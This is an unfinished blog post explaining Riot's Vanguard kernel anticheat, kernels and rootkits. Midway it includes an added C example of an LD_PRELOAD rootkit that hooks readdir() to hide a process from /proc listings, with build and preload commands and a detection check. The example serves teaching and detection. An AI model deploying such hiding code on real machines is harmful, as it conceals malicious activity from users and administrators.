UPDATE 24 August 2024: I never finished this. I don’t feel like erasing it before deploying something else to the site. Do whatever with it. Maybe I finish it, maybe I don’t.
On 1 May 2024, with patch 14.9, Riot deployed kernel-mode anticheat to League of Legends. This has made a lot of people very angry and been widely regarded as a bad move.
Various takes on the software sit almost exclusively at one of two extremes, “BUT CHINA!” and “BUT CHEATERS!”, and are written by people with little-to-no IT experience.
This is an attempt to provide a somewhat-neutral overview of the software, its impact, the rollout, the potential risks, and potential mitigations. My hope is that you can make an informed decision for yourself, and feel comfortable referencing this document to others.
Technical explanations here are greatly simplified, and focused only on aspects that apply to Vanguard, its rollout, and its controversy.
If you are here because your computer has broken, the FIRST thing you should do is open a ticket on Riot’s support portal. This is so you can count towards the number of players reporting issues.
Skip to…
The Kernel
The Rationale
The Risk
The Rollout
The Fallout
The PR Job
“I’m not reading all of this!”
You don’t have to.
The tl;dr is that there’s a very, very small, but never zero, chance that a vulnerability exists in Vanguard that can be used to take over computers. There is a significantly higher risk that it won’t play well with certain hardware peripherals. The requirement that Vanguard starts with the system is controversial, and multiplies these downsides: the driver is loaded, and exposed, whenever the machine is on, not just while you are playing.
My recommendation is to run Vanguard on a clean machine with just games that require it.
I do not believe that Vanguard sets a good and healthy precedent. My guess is that streaming services will want their own kernel modules next. You will be told it’s to prevent piracy.
“Kernel, who?”
You can skip this if you’ve heard p much any other explanation on what a kernel is.
The kernel is, to put it simply, the lowest level of the operating system. It’s the lowest you can go before you’ve hit the hardware. In fact, the kernel is typically what’s responsible for working with the hardware itself. When applications fall to the ground and start convulsing, the kernel puts them out of their misery. It decides when programs run, it manages their requests for memory, and so much more.
In terms of permissions and what it can do, the kernel is God Himself. When applications have to do things like start network connections and open files, they don’t actually do that themselves. They ask the kernel to do it on their behalf. Even keypresses pass through the kernel.
Good practice is to keep code out of the kernel unless there’s a damn good reason for it to be there. This is for a few reasons, but the most important ones for today’s discussion are:
- Kernel code crashing takes out the rest of the system (a “blue screen”)
- Kernel code being vulnerable makes attackers Literally God.
This must be stressed. If there is a bug in kernel code, the best case scenario is a crash. The worst case scenario is complete system takeover.
This means that kernel code, ideally, is
- As minimal as possible, anything unnecessary trimmed out or moved elsewhere
- Built to handle weird, strange conditions with grace
- Heavily tested to make sure it can handle being handed bullshit
tl;dr: The kernel is God. God can do anything. God can see everything. The kernel isn’t a part of the system, it creates the system.
“Why do games need to be there?”
You can skip this if you’ve heard p much any game developer discuss anticheat
Cheats either read a game’s memory, or make changes to it, in order to work.
The goal of anticheat is to either make this harder/impossible, or to catch something doing it. You can also scan the filesystem for things that might do it.
Any time an anticheat runs at a given “level” of a system, the natural next move of the cheat developer is to go deeper. This is because lower levels, generally, can lie to the higher ones.
For example, if the anticheat asks “Give me a list of code snippets that make up GuitarHeroRickAstleyEdition.exe”, a cheat running at a lower level than the anticheat can simply… not mention the code snippets that represent cheats.
Ideally, then, an anticheat would be at the lowest level possible, the kernel, where it cannot be lied to.
In theory. We’ll get into that later right now.
Vanguard is unusual among kernel-mode anticheats. While the rest of them (that is, everything except Vanguard) only run alongside the game they protect, Vanguard starts with the system. The official rationale given for this is so it can monitor the boot process to ensure that nothing has started before it that could then start lying.
For more information, you can read this somehow cringier than me official writeup from Riot head of anticheat Philip Koskinas. It is his job to sell Vanguard to you, not mine.
tl;dr: If anticheat isn’t in the kernel, it’ll get lied to by cheats that are. The cheat will tell the anticheat that the fire in the kitchen is, in fact, the northern lights.
“What is a rootkit?”
Don’t skip this. It’ll keep you from sounding stupid when you call shit a “rootkit”
A rootkit is, again to put it very simply, software that makes your computer lie to you.
That may sound dramatic, but let’s actually go into it. Normal malware might do something like inject ads into your system, log keystrokes, send your files elsewhere, steal passwords or cryptocurrency, etc. But at the end of the day, regardless of what a program does, it appears on a list of running processes, and you can find it on disk.
A rootkit, on the other hand, is something you’d use to hide something else. But how?
Operating systems offer specific methods for doing things like listing running processes, open network connections, files on disk, and so forth. A rootkit takes over these functions, and makes them return incorrect data. For example, if you have malware you want to hide with a rootkit, it might intercept a call for a list of running processes, and return a list that doesn’t mention the malware you are trying to hide.
At first glance, it may seem obvious that rootkits need to be inside the kernel in order to be effective. This isn’t necessarily true! As long as a rootkit gets loaded into the software it is trying to lie to, it’s effective. Given that there are “base” snippets of code (called libraries) that all programs must call upon, if you can infect that “base”, you infect every program on the system, as they start.
You can also infect the part of the operating system (the “dynamic linker”) that actually puts all of the parts of a program together when it starts. An excellent example is one of the OGs of that flavor of rootkit, Umbreon. (And I’m not just mentioning that one because my girlfriend wrote it!)
Is Vanguard a rootkit? There is currently no evidence that it does the things we normally associate with one.
However, I would like to point out that if you believe Vanguard is a rootkit, you will never prove it by using tools that are running on the machine. Tools like Task Manager and Wireshark would not show processes and traffic from a properly-designed rootkit.
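To make the library-hooking trick concrete, and to show what “the lower level lies to the higher one” looks like in practice, here is a toy version of it. It is added to this page as an example; it is not Umbreon’s code and has nothing to do with Vanguard. It interposes readdir() the way a preload rootkit does, hides one /proc entry (this process’s own PID, so you don’t need a second process), and then shows the one kind of check that can still catch it from inside the machine: asking the kernel whether the PID exists via kill(pid, 0) and comparing that with what the directory listing claims. Assumptions that are not in the original post: Linux with a /proc filesystem, a C compiler, and glibc or musl (on glibc older than 2.34 add -ldl when linking). The HIDE_PID environment variable and every function name below are mine, not anything from a real rootkit.

```c
/* Added example, not code from the original post, from Umbreon, or from Riot.
 *
 * Build as a preload library:  gcc -shared -fPIC -o hide.so hide.c   (older glibc: add -ldl)
 * Lie to a victim process:     HIDE_PID=$$ LD_PRELOAD=./hide.so ls /proc   (your shell vanishes)
 * Build the stand-alone demo:  gcc -o hide hide.c && ./hide
 *
 * Assumptions: Linux, /proc mounted, glibc or musl. */
#define _GNU_SOURCE
#include <dirent.h>
#include <dlfcn.h>
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

static char hidden_name[32];   /* the /proc entry name to suppress, e.g. "1234" */

/* Pick the PID to hide. A real rootkit reads this from a config file or an
 * environment variable; the demo uses the calling process's own PID. */
void rootkit_hide_pid(pid_t pid) {
    snprintf(hidden_name, sizeof hidden_name, "%d", (int)pid);
}

/* When preloaded into another program, take the PID from HIDE_PID (made up
 * for this example) so nobody has to call rootkit_hide_pid() for us. */
__attribute__((constructor)) static void init_from_env(void) {
    const char *p = getenv("HIDE_PID");
    if (p) snprintf(hidden_name, sizeof hidden_name, "%s", p);
}

/* The lie itself: 1 if this directory entry must not be reported. */
int rootkit_should_hide(const char *name) {
    return hidden_name[0] != '\0' && strcmp(name, hidden_name) == 0;
}

/* Interposed readdir(). Because this symbol is defined in the preloaded
 * library (or, in the stand-alone build, in the executable), the dynamic
 * linker resolves the program's readdir() calls here instead of to libc.
 * RTLD_NEXT hands us the real libc implementation to forward to. */
struct dirent *readdir(DIR *dirp) {
    static struct dirent *(*real_readdir)(DIR *) = NULL;
    if (!real_readdir)
        real_readdir = (struct dirent *(*)(DIR *))dlsym(RTLD_NEXT, "readdir");
    struct dirent *e;
    while ((e = real_readdir(dirp)) != NULL) {
        if (!rootkit_should_hide(e->d_name))
            return e;           /* ordinary entry: pass it through untouched */
        /* hidden entry: skip it and report the next one instead */
    }
    return NULL;
}

/* What a "tool running on the machine" sees: 1 if /proc lists pid, 0 if not,
 * -1 if /proc cannot be opened. Goes through readdir(), so it gets lied to. */
int proc_lists_pid(pid_t pid) {
    char want[32];
    snprintf(want, sizeof want, "%d", (int)pid);
    DIR *d = opendir("/proc");
    if (!d) return -1;
    int found = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL)
        if (strcmp(e->d_name, want) == 0) { found = 1; break; }
    closedir(d);
    return found;
}

/* Cross-view check (the idea behind tools like unhide): the kernel says the
 * PID exists (kill(pid, 0) succeeds, or fails only with EPERM) but the
 * directory listing of /proc omits it, so something is hiding it from us.
 * Returns 1 if pid is hidden, 0 if both views agree, -1 on error. */
int pid_is_hidden(pid_t pid) {
    int alive = (kill(pid, 0) == 0) || (errno == EPERM);
    int listed = proc_lists_pid(pid);
    if (listed < 0) return -1;
    return alive && !listed;
}

int main(void) {
    pid_t me = getpid();
    printf("before hook: /proc lists me=%d hidden=%d\n", proc_lists_pid(me), pid_is_hidden(me));
    rootkit_hide_pid(me);
    printf("after hook:  /proc lists me=%d hidden=%d\n", proc_lists_pid(me), pid_is_hidden(me));
    return 0;
}
```

The point of the second half is the one made above: proc_lists_pid() is exactly what ps and Task Manager-style tools do, and it happily reports that the process does not exist. Only a second, independent view of the same fact (here, the kernel’s answer to kill(pid, 0); on a real box, a listing taken from outside the machine or from a clean boot) exposes the lie. This toy only hooks readdir(); a real preload rootkit hooks dozens of functions (stat, fopen, getdents, the socket listing, and so on) so that every view on the machine agrees with the lie.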
tl;dr: A rootkit makes your computer gaslight you.
“What could possibly go wrong?”
You can skip this if you were going to dismiss literally anything I could possibly say anyway.
The potential problems generally fall into five categories, in descending order of probability:
- Oversights leading to crash bugs (blue screens)
- Oversights leading to misconfiguring the computer
- Oversights leading to false positives (false bans)
- Oversights leading to vulnerabilities in code running in the kernel
- Riot/Tencent/China spying on you
I’ll address the last one first: I genuinely think it’s unlikely that Vanguard will be used to spy on you. While Tencent has a significant financial stake in Riot, all of the people in control are American citizens living in America. These are people who could be hauled in front of Congress or even jailed for mass-scale espionage. Being caught doing that would be career-ending. I’d imagine a lot of people involved would also voluntarily resign and blow the whistle.
It’s simply unlikely. If your primary argument against Vanguard is “CHINA!!!”, you’re stupid, and you’re making the rest of us look stupid, too.
On the flip side, if your only argument against those who don’t like Vanguard is that they’re paranoid or racist, you’re stupid. Just as stupid as those crying “CHINA!”
Vanguard is far more likely to break your Windows install or get innocent players banned.
Oversights leading to crash bugs (blue screens)
As I mentioned before, if code in the kernel crashes, the entire system goes down with it. This means that any code that someone introduces into the kernel needs to be robust. People writing kernel code need to be extremely careful, and they need to test their code across a wide range of hardware configurations.
UPDATE 24 August 2024: LMFAO NVM VANGUARD DOES THIS BETTER THAN FUCKING CROWDSTRIKE
Like I don’t even need to link you to a news article because literally everyone who isn’t Amish knows how bad CrowdStrike fucked up.
Oversights leading to misconfiguring the computer
These are the bugs that Riot is actually willing to admit to. In short, changing a setting to enable a feature required by Vanguard can expose an incompatibility between that feature and either the way the system was installed, or some piece of hardware.
Interestingly, the specific option causing this problem, “secure boot”, is not required by Vanguard when playing League. It just so happens that lots of players enabled this feature because they read somewhere that it might be a good idea. Sometimes, that somewhere was help documentation for Valorant, which has different requirements.
Like I said. Didn’t finish.